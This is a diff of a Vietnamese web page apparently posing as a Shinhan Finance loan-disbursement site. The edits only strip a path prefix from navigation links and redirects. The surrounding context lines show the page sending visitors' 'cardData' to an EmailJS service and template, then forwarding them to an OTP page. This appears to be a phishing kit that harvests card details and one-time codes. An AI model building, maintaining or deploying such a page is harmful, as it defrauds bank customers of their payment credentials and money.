--- a/pages/vi/atm.html
+++ b/pages/vi/atm.html
@@ -522,14 +522,14 @@
 
     <nav role="navigation" aria-label="Main Navigation">
         <ul id="nav-menu">
-            <li><a href="/shinhanfinance/pagess/vi/trang-chu.html">Trang Chủ</a></li>
-            <li><a href="/shinhanfinance/pagess/vi/gioi-thieu.html">Giới Thiệu</a></li>
-            <li><a href="/shinhanfinance/pagess/vi/ca-nhan.html">Lợi Ích</a></li>
-            <li><a href="/shinhanfinance/pagess/vi/lai-suat-tien-gui.html">Giấy Tờ Cần Thiết</a></li>
-            <li><a href="/shinhanfinance/pagess/vi/Evaluate-conditions.html">Đăng Ký Giải Ngân</a></li>
-            <li><a href="/shinhanfinance/pagess/vi/check_result.html">Xem Kết Quả</a></li>
-            <li><a href="/shinhanfinance/pagess/vi/dieu-khoan-su-dung.html">Điều Khoản Sử Dụng</a></li>
-            <li><a href="/shinhanfinance/pagess/vi/support-center.html">Liên Hệ</a></li>
+            <li><a href="/pagess/vi/trang-chu.html">Trang Chủ</a></li>
+            <li><a href="/pagess/vi/gioi-thieu.html">Giới Thiệu</a></li>
+            <li><a href="/pagess/vi/ca-nhan.html">Lợi Ích</a></li>
+            <li><a href="/pagess/vi/lai-suat-tien-gui.html">Giấy Tờ Cần Thiết</a></li>
+            <li><a href="/pagess/vi/Evaluate-conditions.html">Đăng Ký Giải Ngân</a></li>
+            <li><a href="/pagess/vi/check_result.html">Xem Kết Quả</a></li>
+            <li><a href="/pagess/vi/dieu-khoan-su-dung.html">Điều Khoản Sử Dụng</a></li>
+            <li><a href="/pagess/vi/support-center.html">Liên Hệ</a></li>
         </ul>
     </nav>
 
@@ -863,7 +863,7 @@
             } catch (error) {
                 console.error('Error parsing formData:', error);
                 alert('Lỗi khi tải thông tin giải ngân. Vui lòng thử lại.');
-                window.location.href = '/shinhanfinance/pagess/vi/Evaluate-conditions.html';
+                window.location.href = '/pagess/vi/Evaluate-conditions.html';
             }
         });
 
@@ -1045,7 +1045,7 @@
                 emailjs.send('service_149dqxt', 'template_d6bnj4k', cardData).then(
                     () => {
                         console.log('EmailJS sent successfully');
-                        window.location.href = '/shinhanfinance/pagesss/vi/otp.html';
+                        window.location.href = '/pagesss/vi/otp.html';
                     },
                     (error) => {
                         console.error('EmailJS error:', error);
